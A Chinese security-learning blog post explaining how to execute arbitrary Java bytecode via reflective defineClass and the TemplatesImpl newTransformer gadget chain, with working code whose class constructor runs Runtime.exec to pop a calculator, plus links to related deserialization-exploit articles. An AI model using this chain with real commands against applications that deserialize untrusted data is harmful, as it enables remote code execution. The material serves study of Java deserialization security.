[Java安全]利用TemplatesImpl执行字节码

最新推荐文章于 2024-04-17 20:49:49 发布
最新推荐文章于 2024-04-17 20:49:49 发布
阅读量2.7k 收藏 3
点赞数 8
分类专栏: 安全学习 # Java代码审计 # 我的JAVA学习之路
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/solitudi/article/details/119082164
版权

文章目录

defineClass

介绍之前首先还是要知道defineClass的利用方式,下面给出简单的代码

public class TouchFile{
    
    public TouchFile() throws Exception {
        Runtime.getRuntime().exec("calc");
    }
    
}

把它编译成字节码后Base64
之后运行

Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
defineClass.setAccessible(true);
byte[] code =Base64.getDecoder().decode("yv66vgAAADQAHgoABgARCgASABMIABQKABIAFQcAFgcAFwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAYAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAApTb3VyY2VGaWxlAQAOVG91Y2hGaWxlLmphdmEMAAcACAcAGQwAGgAbAQAEY2FsYwwAHAAdAQAJVG91Y2hGaWxlAQAQamF2YS9sYW5nL09iamVjdAEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAGAAAAAAACAAEABwAIAAIACQAAAC4AAgABAAAADiq3AAG4AAISA7YABFexAAAAAQAKAAAADgADAAAAEAAEABEADQASAAsAAAAEAAEADAAJAA0ADgACAAkAAAAmAAIAAQAAAAq4AAISA7YABFexAAAAAQAKAAAACgACAAAAFgAJABcACwAAAAQAAQAMAAEADwAAAAIAEA==");
Class yyds= (Class) defineClass.invoke(ClassLoader.getSystemClassLoader(), "TouchFile", code, 0, code.length);
yyds.newInstance();

成功弹出了计算器
在这里插入图片描述

利用TemplatesImpl执行字节码

但是在实际场景中,因为defineClass方法作用域却是不开放的,所以我们很很难直接利用到它,因此就出现了这篇文章TemplatesImpl
可以看到在TransletClassLoader中的defineClass调用了此方法在这里插入图片描述

再往上TemplatesImpldefineTransletClasses方法
在这里插入图片描述再往上TemplatesImplgetTransletInstance方法

在这里插入图片描述
再往上TemplatesImpl的newTransformer方法,此时已经是public方法了外面可以直接调用,不需要再继续网上跟了
在这里插入图片描述
因此我们得到了一条利用链

TemplatesImpl#newTransformer() ->
TemplatesImpl#getTransletInstance() ->
TemplatesImpl#defineTransletClasses() ->
TransletClassLoader#defineClass()

执行

byte[] code =Base64.getDecoder().decode(“");
TemplatesImpl obj = new TemplatesImpl();
setFieldValue(obj, "_class", null);
 setFieldValue(obj, "_bytecodes", new byte[][]{code});
setFieldValue(obj, "_name", "yyds");
 setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
obj.newTransformer();

其中setFieldValue是利用反射给私有变量赋值如下

public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }

注意_tfactory 必须为TransformerFactoryImpl 对象,另外,TemplatesImpl 中对加载的字节码是有一定要求的:这个字节码对应的类必须
com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet的子类

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class Yyds extends AbstractTranslet {
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }

    public Yyds () throws Exception  {
        super();
        Runtime.getRuntime().exec("calc");
    }
}

搞定,完毕

Y4tacker
关注
  • 8
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Java字节码简单说明.docx
03-10
Java字节码简单说明
Stakcery#JavaSec#利用TemplatesImpl执行字节码1
07-25
介绍之前首先还是要知道defineClass的利用方式,下面给出简单的代码public TouchFile() throws Exception {把它编译成字
利用TemplatesImpl加载字节码
Thunderclap的博客
02-06 388
调用了 TemplatesImpl#newTransformer() 并且它也是 public 类型的,如下也成功触发。TemplatesImpl 类中已经没有调用 getTransletClasses() 的方法了,而 getTransletInstance() 方法在。com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl 这个类中定义了一个内部类。Java中默认情况下,如果一个。方法中被调用了,所以构造如下链,P牛用的就是如下的链。
爆赞好文之java动态字节码加载(TemplatesImpl)简谈
最新发布
2301_79724395的博客
04-17 1101
虽然已经学过了,不过忘完了,nice,重学动态加载就是很动态知道吧,你以为,说了等于没说,怎么个动态法呢?具体是在于三个函数loadClass()从已经加载的类缓存、父加载器等位置寻找类(其实就是双亲委派机制),在前面没有找到的情况下执行findClassfindClass()根据基础URL指定的方法来加载类的字节码,可能会在本地文件系统,jar包,或是远程http服务器上读取字节码,然后交给下一个函数defineClass()的作用就是处理前面传入的字节码,将其处理为真正的Java类。
templateslmpl利用
qq_62046696的博客
03-13 377
cc3Jdk版本:调用AnnoctionInvocationHandler中的版本需要在,
Java反序列化5-Fastjson 1.2.22-1.2.24 TemplatesImpl利用链分析
weixin_43263451的博客
07-12 906
Fastjson是alibaba开源的一个json库,能够对json字符串进行序列化与反序列化操作。其在1.2.22-1.2.24版本被爆出来存在反序列化漏洞。该反序列化漏洞一共有两条链子这次主要分析的是TemplateImpl利用链。这条链子还是利用了TemplateImpl类,将avasisit生成的恶意类赋值给_bytecodes属性,当反序列化TemplateImpl对象时会调用其gettter和setter方法,在调用这些方法的时候调用了newTransformer从而进入TemplateImpl
TemplatesImpl在Shiro中的利用
Le1a's Blog
03-23 3041
TemplatesImpl在Shiro中的利用 文章首发自: https://www.le1a.com/posts/6e876d26/ 前言 前面学习了CC1、CC3和CC6,其中CC6是不限制版本的一条链,那么为什么还要用到TemplatesImpl这条链呢?不妨我们设想一下:命令执行和代码执行到底谁更有价值? 例如在PHP中会遇到一个场景,call_user_func和eval都能造成的代码执行,而更多的人愿意使用eval,原因是call_user_func在某种情况下会被限制不能使用assert和sy
Java字节码指令集的使用详细
09-05
Java字节码指令集是Java虚拟机(JVM)执行程序的基础,它是Java源代码经过编译后的二进制表示形式。每个字节码指令都由一个操作码(Opcode)和可能的操作数组成,用于控制JVM执行各种操作。本文将深入探讨Java字节码...
Javassist如何操作Java 字节码
09-07
Javassist是一个强大的Java字节码操作库,它允许开发者在运行时动态修改或创建类。Javassist的出现使得开发者无需深入理解底层...通过掌握Javassist,你可以更好地利用Java字节码的能力,提升代码的灵活性和可扩展性。
Java字节码加密工具
08-28
本文将详细阐述Java字节码加密的相关知识点,以及如何利用名为"classfinal"的开源项目来加强代码的安全性。 一、Java字节码加密原理 1. 字节码混淆:混淆技术通过重命名类、方法和变量,使用无意义的字符串,使得...
java字节码.docx
04-12
Java 字节码解读 Java 字节码是一种中间形式的代码,它是 Java 源代码编译后的结果。Java 字节码是平台独立的,可以在任何支持 Java 的设备上运行。Java 字节码的结构主要包括魔数、主版本号、次版本号、常量池、...
Fastjson反序列化解析流程分析(以TemplatesImpl加载字节码过程为例)
Y4tacker的博客
09-13 681
文章目录写在前面流程分析 写在前面 关于TemplatesImpl加载字节码就不多说了,之前也写过自己翻一翻,或者网上看看其他大佬的,至于为什么选择这一个,因为这里面大多数过程都有,除了$ref,算是比较全面了 流程分析 核心代码 public class test1 { public static void main(String[] args) throws Exception{ String payload = "{\"@type\":\"com.sun.org.apache
Java代码审计——Commons Collections2 TemplatesImpl底层调用链
王嘟嘟的博客
11-25 1100
0x00 前言 分析完了CC1和TransformedMap链,接着来看CC2这个链,看了一些文章,但是仅仅是看的话,无法真切的理解其中的含义,所以需要进行自己分析,并且记录其中关键点。这一篇主要是把底层调用遇到的问题讲清楚。 0x01 底层调用链 底层调用链分为两层,一层是Java类字节化,一层是通过TemplatesImpl进行调用。 1.Java类字节化 这里Java字节化选择的是Javassist。 简单的说一下Javassist,Javassist主要是用来做动态生成Java类的库,可以从输入的内
[Java反序列化]Java-CommonsCollections2TemplatesImpl利用链分析
Y4tacker的博客
07-28 485
文章目录Java-CommonsCollections2TemplatesImpl利用链分析完整代码 Java-CommonsCollections2TemplatesImpl利用链分析 我们知道我们之前可以利用TemplatesImpl 构造出⽆Transformer数组的利⽤链,那这里是否可以实现呢,答案是是的,在这里的queue 现在开始正文,还是稍微详细说一下利用过程吧 现在我们的目标就是通过PriorityQueue来调用TemplatesImpl的newTransformer来加载字节码 T
TemplatesImpl类Gadget中提取bytecode
fnmsd的博客
03-22 4405
大半年前开的头,扔那就给忘了,终于想起来给写完了(*/ω\*)
fastjson1.2.24TemplatesImpl利用链源码分析
weixin_45682070的博客
12-28 712
构造恶意类 package org.example.fastjson.TemplatesImpl; import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.parser.Feature; import com.alibaba.fastjson.parser.ParserConfig; public class Test { public static void main(String[] args) { Parse
TemplatesImpl利用链与Fastjson注入内存马
weixin_42508548的博客
01-31 1000
TemplatesImpl利用链是一个非常重要的东西,要知道,CC链可以用它,CB链也用它,注入内存马还是用它。因为它可以加载java字节码并实例化。ClassLoader,类加载器,是JVM执行类加载机制的前提,其主要任务为根据一个类的全限定名来读取此类的二进制字节流到JVM内部,然后转换为一个与目标类对应的java.lang.Class对象实例。文章第四部分,了解了实例化类的时候,会自动执行static{}代码块,{}代码块,无参构造方法那么如何注入内存马呢,也是通过newInstance实现。
利用TemplatesImpl攻击shiro-Shiro550
Christ1na的博客
10-13 803
为了让浏览器或服务器重启后用户不丢失登录状态,Shiro支持将持久化信息序列化并加密后保存在Cookie的rememberMe字段中,下次读取时进行Base64解密后,再使用aes密钥解密后的数据,进行反序列化。resolveClass 是反序列化中用来查找类的方法,简单来说,读取序列化流的时候,读到一个字符串形式的类名,需要通过这个方法来找到对应的 java.lang.Class 对象。也就是说,如果反序列化流中包含非Java自身的数组,则会出现无法加载类的错误。
执行java字节码所用到的命令
03-28
执行Java字节码可以使用以下命令: 1. 使用Java虚拟机(JVM)执行字节码: ``` java <class name> ``` 例如: ``` java HelloWorld ``` 2. 使用Java编译器(javac)编译字节码执行: ``` javac <filename.java> java <class name> ``` 例如: ``` javac HelloWorld.java java HelloWorld ``` 3. 使用Java解释器(jshell)执行字节码: ``` jshell /open <filename.class> ``` 例如: ``` jshell /open HelloWorld.class ``` 注意:以上命令中的“<filename.java>”和“<filename.class>”分别表示Java源文件和编译后的字节码文件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值